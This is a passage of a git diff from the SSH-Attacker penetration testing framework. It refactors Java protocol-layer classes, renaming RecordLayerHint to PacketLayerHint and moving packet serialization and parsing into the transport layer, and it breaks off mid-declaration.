b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 8e9aeea6f..62265fb76 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -25,7 +25,7 @@ import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; @@ -156,8 +156,8 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException "The DTLS fragment layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); currentInputStream = new HintedLayerInputStream(null, this); currentInputStream.extendStream(dataStream.readAllBytes()); - } else if (dataStream.getHint() instanceof RecordLayerHint) { - RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); + } else if (dataStream.getHint() instanceof PacketLayerHint) { + PacketLayerHint tempHint = (PacketLayerHint) dataStream.getHint(); /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); fragment.setEpoch(tempHint.getEpoch()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 08f6af8d4..da770bc80 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -27,13 +27,17 @@ import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Preparator; +import de.rub.nds.sshattacker.core.layer.data.Serializer; import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; +import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; import java.io.ByteArrayOutputStream; @@ -57,7 +61,7 @@ private void flushCollectedMessages( if (byteStream.size() > 0) { getLowerLayer() .sendData( - new RecordLayerHint(runningProtocolMessageType), + new PacketLayerHint(runningProtocolMessageType), byteStream.toByteArray()); byteStream.reset(); } @@ -75,6 +79,16 @@ public LayerProcessingResult sendConfiguration() throws IOException { || !prepareDataContainer(message, context)) { continue; } + + MessageLayer messageLayer = context.getMessageLayer(); + AbstractPacket packet = messageLayer.serialize(message); + Preparator preparator = packet.getPreparator(context); + preparator.prepare(); + Serializer serializer = packet.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); + + getLowerLayer().sendData(null, serializedMessage); + // Es gibt erstmal keine Handshake-Messages mit einer Spezialbehandlung bei SSH /*if (!message.isHandshakeMessage()) { // only handshake messages may share a record @@ -158,8 +172,8 @@ public LayerProcessingResult receiveData() { LOGGER.warn( "The TLS message layer requires a processing hint. E.g. a record type. Parsing as an unknown message"); readUnknownProtocolData(); - } else if (tempHint instanceof RecordLayerHint) { - RecordLayerHint hint = (RecordLayerHint) dataStream.getHint(); + } else if (tempHint instanceof PacketLayerHint) { + PacketLayerHint hint = (PacketLayerHint) dataStream.getHint(); readMessageForHint(hint); } // receive until the layer configuration is satisfied or no data is left @@ -240,7 +254,7 @@ private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) | totalHeaderLength[1]; }*/ - public void readMessageForHint(RecordLayerHint hint) { + public void readMessageForHint(PacketLayerHint hint) { switch (hint.getType()) { // use correct parser for the message /* case ALERT: @@ -396,8 +410,8 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException "The DTLS fragment layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); currentInputStream = new HintedLayerInputStream(null, this); currentInputStream.extendStream(dataStream.readAllBytes()); - } else if (dataStream.getHint() instanceof RecordLayerHint) { - RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); + } else if (dataStream.getHint() instanceof PacketLayerHint) { + PacketLayerHint tempHint = (PacketLayerHint) dataStream.getHint(); /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); fragment.setEpoch(tempHint.getEpoch()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index b66f94c0f..70817c3a3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -19,33 +19,33 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.message.*;*/ +import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; -import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.exceptions.PreparationException; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Preparator; +import de.rub.nds.sshattacker.core.layer.data.Serializer; import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; import de.rub.nds.sshattacker.core.packet.AbstractPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; -import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; -import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; -import de.rub.nds.sshattacker.core.session.Session; -import de.rub.nds.sshattacker.core.session.preparator.SessionPreparator; -import de.rub.nds.sshattacker.core.session.serializer.SessionSerializer; +import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; +import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; +import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; +import java.io.ByteArrayOutputStream; import java.io.IOException; - -import de.rub.nds.sshattacker.core.workflow.action.executor.MessageActionResult; +import java.io.InputStream; +import java.util.LinkedList; +import java.util.List; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class TransportLayer extends ProtocolLayer { +public class TransportLayer extends ProtocolLayer { private static final Logger LOGGER = LogManager.getLogger(); private SshContext context; @@ -78,21 +78,24 @@ public LayerProcessingResult sendConfiguration() throws IOException { } return getLayerResult();*/ - LayerConfiguration configuration = getLayerConfiguration(); + LayerConfiguration configuration = getLayerConfiguration(); if (configuration != null && configuration.getContainerList() != null) { - for (SshMessage message: configuration.getContainerList()) { - if (containerAlreadyUsedByHigherLayer(message) /*|| skipEmptyRecords(session)*/) { + for (AbstractPacket packet : configuration.getContainerList()) { + if (containerAlreadyUsedByHigherLayer(packet) /*|| skipEmptyRecords(session)*/) { continue; } - MessageLayer messageLayer = context.getMessageLayer(); + // MessageLayer messageLayer = context.getMessageLayer(); try { - AbstractPacket packet = messageLayer.serialize(message); - AbstractPacketLayer packetLayer = context.getPacketLayer(); - byte[] serializedMessage = packetLayer.preparePacket(packet); + // AbstractPacket packet = messageLayer.serialize(message); + Preparator preparator = packet.getPreparator(context); + preparator.prepare(); + Serializer serializer = packet.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); - LayerProcessingResult layerProcessingResult = getLowerLayer().sendData(null, serializedMessage); + LayerProcessingResult layerProcessingResult = + getLowerLayer().sendData(null, serializedMessage); /*sendPacket(context, packet); Handler handler = message.getHandler(context); @@ -103,7 +106,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { Collections.singletonList(packet), Collections.singletonList(message));*/ } catch (IOException e) { LOGGER.warn("Error while sending packet: " + e.getMessage()); - //return new MessageActionResult(); + // return new MessageActionResult(); } } @@ -115,22 +118,26 @@ public LayerProcessingResult sendConfiguration() throws IOException { .orElse(new MessageActionResult()); }*/ -/* ProtocolMessageType contentType = packet.getContentMessageType(); - if (contentType == null) { - contentType = ProtocolMessageType.UNKNOWN; - LOGGER.warn( - "Sending record without a LayerProcessing hint. Using \"UNKNOWN\" as the type"); - } - *//*if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS() - && session.getEpoch() == null) { - session.setEpoch(writeEpoch); - }*//* - if (packet.getCleanProtocolMessageBytes() == null) { - packet.setCleanProtocolMessageBytes(new byte[0]); - } - SessionPreparator preparator = - packet.getSessionPreparator( - context, *//* encryptor, compressor, *//* contentType); + /* ProtocolMessageType contentType = packet.getContentMessageType(); + if (contentType == null) { + contentType = ProtocolMessageType.UNKNOWN; + LOGGER.warn( + "Sending record without a LayerProcessing hint. Using \"UNKNOWN\" as the type"); + } + */ + /*if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS() + && session.getEpoch() == null) { + session.setEpoch(writeEpoch); + }*/ + /* + if (packet.getCleanProtocolMessageBytes() == null) { + packet.setCleanProtocolMessageBytes(new byte[0]); + } + SessionPreparator preparator = + packet.getSessionPreparator( + context, */ + /* encryptor, compressor, */ + /* contentType); preparator.prepare(); preparator.afterPrepare(); SessionSerializer serializer = packet.getSessionSerializer(); @@ -144,9 +151,58 @@ public LayerProcessingResult sendConfiguration() throws IOException { } @Override - public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) - throws IOException { - return sendConfiguration(); + public LayerProcessingResult sendData( + PacketLayerHint hint, byte[] additionalData) throws IOException { + ProtocolMessageType type = ProtocolMessageType.UNKNOWN; + if (hint != null) { + type = hint.getType(); + } else { + LOGGER.warn( + "Sending record without a LayerProcessing hint. Using \"UNKNOWN\" as the type"); + } + + List packets = new LinkedList<>(); + List givenPackets = getLayerConfiguration().getContainerList(); + + int dataToBeSent = additionalData.length; + + while (givenPackets.size() > 0 && dataToBeSent > 0) { + AbstractPacket nextPacket = givenPackets.remove(0); + packets.add(nextPacket); + /* int recordData = + (nextPacket.get() != null + ? nextPacket.getMaxRecordLengthConfig() + : context.getChooser().getOutboundMaxRecordDataSize()); + dataToBeSent -= recordData;*/ + } + + ByteArrayOutputStream stream = new ByteArrayOutputStream(); + + // prepare, serialize, and send records + for (AbstractPacket packet : packets) { + /* ProtocolMessageType contentType = packet.getContentMessageType(); + if (contentType == null) { + contentType = type; + }*/ + /* if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS()) { + record.setEpoch(writeEpoch); + }*/ + Preparator preparator = packet.getPreparator(context); + preparator.prepare(); + preparator.afterPrepare(); + try { + byte[] recordBytes = packet.getSerializer(context).serialize(); + packet.setCompletePacketBytes(recordBytes); + stream.write(packet.getCompletePacketBytes().getValue()); + } catch (IOException ex) { + throw new PreparationException( + "Could not write Record bytes to ByteArrayStream", ex); + } + addProducedContainer(packet); + } + + getLowerLayer().sendData(null, stream.toByteArray()); + return new LayerProcessingResult<>(packets, getLayerType(), true); } @Override @@ -223,81 +279,30 @@ private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) @Override public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { - try { - HintedInputStream dataStream = null; - dataStream = getLowerLayer().getDataStream(); - if (dataStream.getHint() == null) { - LOGGER.warn( - "The Transport-layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); - currentInputStream = new HintedLayerInputStream(null, this); - currentInputStream.extendStream(dataStream.readAllBytes()); - } else if (dataStream.getHint() instanceof RecordLayerHint) { - RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); - /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { - DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); - fragment.setEpoch(tempHint.getEpoch()); - DtlsHandshakeMessageFragmentParser parser = - fragment.getParser( - context, - new ByteArrayInputStream( - dataStream.readChunk(dataStream.available()))); - parser.parse(fragment); - fragment.setCompleteResultingMessage( - fragment.getSerializer(context).serialize()); - fragmentManager.addMessageFragment(fragment); - List uninterpretedMessageFragments = - fragmentManager.getOrderedCombinedUninterpretedMessageFragments( - true, false); - // run until we received a complete fragment - if (!uninterpretedMessageFragments.isEmpty()) { - DtlsHandshakeMessageFragment uninterpretedMessageFragment = - uninterpretedMessageFragments.get(0); - addProducedContainer(uninterpretedMessageFragment); - RecordLayerHint currentHint = - new RecordLayerHint( - uninterpretedMessageFragment.getProtocolMessageType(), - uninterpretedMessageFragment - .getMessageSequence() - .getValue()); - byte type = uninterpretedMessageFragment.getType().getValue(); - byte[] content = - uninterpretedMessageFragment.getMessageContent().getValue(); - byte[] message = - ArrayConverter.concatenate( - new byte[] {type}, - ArrayConverter.intToBytes( - content.length, - HandshakeByteLength.MESSAGE_LENGTH_FIELD), - content); - if (desiredHint == null || currentHint.equals(desiredHint)) { - if (currentInputStream == null) { - currentInputStream = new HintedLayerInputStream(currentHint, this); - } else { - currentInputStream.setHint(currentHint); - } - currentInputStream.extendStream(message); - } else { - if (nextInputStream == null) { - nextInputStream = new HintedLayerInputStream(currentHint, this); - } else { - nextInputStream.setHint(currentHint); - } - nextInputStream.extendStream(message); - } - } else { - receiveMoreDataForHint(desiredHint); - } - } else { - currentInputStream = new HintedLayerInputStream(tempHint, this); - currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); - }*/ - } - } catch (TimeoutException ex) { - LOGGER.debug(ex); - throw ex; - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more dtls fragments", ex); - throw ex; + + InputStream dataStream = getLowerLayer().getDataStream(); + AbstractPacketParser parser; + AbstractPacket packet; + + if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { + parser = + new BinaryPacketParser( + dataStream, + context.getActiveDecryptCipher(), + context.getReadSequenceNumber()); + packet = new BinaryPacket(); + } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { + parser = new BlobPacketParser(dataStream); + packet = new BlobPacket(); + } else { + throw new RuntimeException(); } + + parser.parse(packet); + + context.getPacketLayer().getDecryptor().decrypt(packet); + context.getPacketLayer().getDecompressor().decompress(packet); + + addProducedContainer(packet); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java index 12310b909..8be45c9bb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java @@ -10,19 +10,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.ModifiableVariableProperty; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; -import de.rub.nds.sshattacker.core.layer.Message; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.DataContainer; -import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; -import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; -import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; -import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; -import de.rub.nds.sshattacker.core.packet.preparator.AbstractPacketPreparator; -import de.rub.nds.sshattacker.core.packet.serializer.AbstractPacketSerializer; import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; -import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -public abstract class AbstractPacket> extends ModifiableVariableHolder implements DataContainer { +public abstract class AbstractPacket> + extends ModifiableVariableHolder implements DataContainer { /** * This field contains the packet bytes sent over the network. This includes packet_length, @@ -99,7 +92,7 @@ public void setPayload(byte[] payload) { this.payload = ModifiableVariableFactory.safelySetValue(this.payload, payload); } -/* public abstract AbstractPacketPreparator getPacketPreparator( + /* public abstract AbstractPacketPreparator getPacketPreparator( Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor); public abstract AbstractPacketParser getPacketParser( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java index b7bf5c149..47d445f1c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java @@ -14,22 +14,17 @@ import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.*; -import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; -import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; -import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; import de.rub.nds.sshattacker.core.packet.handler.BinaryPacketHandler; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.preparator.BinaryPacketPreparator; import de.rub.nds.sshattacker.core.packet.serializer.BinaryPacketSerializer; import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.DebugMessageSerializer; -import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; - import java.io.InputStream; import java.util.List; import java.util.Objects; -public class BinaryPacket extends AbstractPacket implements DataContainer { +public class BinaryPacket extends AbstractPacket + implements DataContainer { /** * The length of the packet in bytes, not including 'mac' or the 'packet_length' field itself. @@ -122,18 +117,20 @@ public void setSequenceNumber(int sequenceNumber) { this.sequenceNumber = ModifiableVariableFactory.safelySetValue(this.sequenceNumber, sequenceNumber); } -/* - @Override - public BinaryPacketPreparator getPacketPreparator( - Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { - return new BinaryPacketPreparator(chooser, this, encryptor, compressor); - } + /* + @Override + public BinaryPacketPreparator getPacketPreparator( + Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { + return new BinaryPacketPreparator(chooser, this, encryptor, compressor); + } -*//* @Override + */ + /* @Override public BinaryPacketParser getPacketParser( byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { return new BinaryPacketParser(array, startPosition, activeDecryptCipher, sequenceNumber); - }*//* + }*/ + /* @Override public BinaryPacketSerializer getPacketSerializer() { @@ -186,12 +183,14 @@ public List getAllModifiableVariableHolders() { @Override public BinaryPacketParser getParser(SshContext context, InputStream stream) { - return new BinaryPacketParser(stream); + return new BinaryPacketParser( + stream, context.getActiveDecryptCipher(), sequenceNumber.getValue()); } @Override public BinaryPacketPreparator getPreparator(SshContext context) { - return new BinaryPacketPreparator(context.getChooser(), this, context.getEncryptor(), context.getCompressor()); + return new BinaryPacketPreparator( + context.getChooser(), this, context.getEncryptor(), context.getCompressor()); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java index 354152a3f..e4ffeacbf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java @@ -7,44 +7,34 @@ */ package de.rub.nds.sshattacker.core.packet; -import de.rub.nds.sshattacker.core.layer.context.LayerContext; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.data.Handler; -import de.rub.nds.sshattacker.core.layer.data.Parser; -import de.rub.nds.sshattacker.core.layer.data.Preparator; -import de.rub.nds.sshattacker.core.layer.data.Serializer; -import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; -import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; -import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; import de.rub.nds.sshattacker.core.packet.handler.BlobPacketHandler; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; import de.rub.nds.sshattacker.core.packet.preparator.BlobPacketPreparator; import de.rub.nds.sshattacker.core.packet.serializer.BlobPacketSerializer; -import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; - import java.io.InputStream; public class BlobPacket extends AbstractPacket { -/* - @Override - public BlobPacketPreparator getPacketPreparator( - Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { - return new BlobPacketPreparator(chooser, this, encryptor, compressor); - } - - @Override - public BlobPacketParser getPacketParser( - byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { - return new BlobPacketParser(array, startPosition); - } -*/ - -/* - @Override - public BlobPacketSerializer getPacketSerializer() { - return new BlobPacketSerializer(this); - } -*/ + /* + @Override + public BlobPacketPreparator getPacketPreparator( + Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { + return new BlobPacketPreparator(chooser, this, encryptor, compressor); + } + + @Override + public BlobPacketParser getPacketParser( + byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { + return new BlobPacketParser(array, startPosition); + } + */ + + /* + @Override + public BlobPacketSerializer getPacketSerializer() { + return new BlobPacketSerializer(this); + } + */ @Override public void prepareComputations() {} @@ -56,7 +46,8 @@ public BlobPacketParser getParser(SshContext context, InputStream stream) { @Override public BlobPacketPreparator getPreparator(SshContext context) { - return new BlobPacketPreparator(context.getChooser(), this, context.getEncryptor(), context.getCompressor()); + return new BlobPacketPreparator( + context.getChooser(), this, context.getEncryptor(), context.getCompressor()); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java index 144d774ed..d6f2f6dc7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java @@ -1,12 +1,20 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ package de.rub.nds.sshattacker.core.packet.handler; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.Handler; import de.rub.nds.sshattacker.core.packet.AbstractPacket; -public abstract class AbstractPacketHandler implements Handler { +public abstract class AbstractPacketHandler + implements Handler { - protected SshContext sshContext = null; + protected SshContext sshContext = null; public AbstractPacketHandler(SshContext sshContext) { this.sshContext = sshContext; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java index 0c53ee944..cd328befe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandler.java @@ -1,17 +1,21 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ package de.rub.nds.sshattacker.core.packet.handler; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; -public class BinaryPacketHandler extends AbstractPacketHandler{ - +public class BinaryPacketHandler extends AbstractPacketHandler { public BinaryPacketHandler(SshContext context) { super(context); } @Override - public void adjustContext(BinaryPacket object) { - - } + public void adjustContext(BinaryPacket object) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java index 6cbd119aa..d71f6d6ba 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BlobPacketHandler.java @@ -1,18 +1,21 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ package de.rub.nds.sshattacker.core.packet.handler; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; -public class BlobPacketHandler extends AbstractPacketHandler{ - +public class BlobPacketHandler extends AbstractPacketHandler { public BlobPacketHandler(SshContext context) { super(context); } @Override - public void adjustContext(BlobPacket object) { - - } + public void adjustContext(BlobPacket object) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java index 7a1ed068e..516f176b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java @@ -9,8 +9,6 @@ import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; -import de.rub.nds.sshattacker.core.exceptions.CryptoException; -import de.rub.nds.sshattacker.core.exceptions.ParserException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.Preparator; import de.rub.nds.sshattacker.core.layer.data.Serializer; @@ -23,8 +21,6 @@ import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; import de.rub.nds.sshattacker.core.packet.crypto.PacketDecryptor; import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; -import de.rub.nds.sshattacker.core.packet.preparator.AbstractPacketPreparator; -import de.rub.nds.sshattacker.core.packet.serializer.AbstractPacketSerializer; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -66,20 +62,25 @@ public AbstractPacketLayer(SshContext context) { * as the parsed packet * @throws ParserException Thrown whenever parsing the provided bytes fails */ + /* public abstract PacketLayerParseResult parsePacket(byte[] rawBytes, int startPosition) throws ParserException, CryptoException; + */ /** * Tries to parse a single packet from rawBytes at startPosition. Due to the nature of SSH * encryption, this does include decryption of the packet. Exception which might occur are * handled. * - * @param rawBytes Bytes to parse - * @param startPosition Start position for parsing + *

//@param rawBytes Bytes to parse //@param startPosition Start position for parsing + * * @return Parse result of the packet layer containing the total number of bytes parsed as well * as the parsed packet */ - public abstract PacketLayerParseResult parsePacketSoftly(byte[] rawBytes, int startPosition); + /* + + public abstract PacketLayerParseResult parsePacketSoftly(byte[] rawBytes, int startPosition); + */ protected void decryptPacket(AbstractPacket packet) { packet.prepareComputations(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java index e26cb4b8a..530ce1991 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java @@ -7,13 +7,9 @@ */ package de.rub.nds.sshattacker.core.packet.layer; -import de.rub.nds.sshattacker.core.exceptions.ParserException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; -import de.rub.nds.sshattacker.core.packet.BlobPacket; -import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; -import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -25,7 +21,7 @@ public BinaryPacketLayer(SshContext context) { super(context); } - @Override + /*@Override public 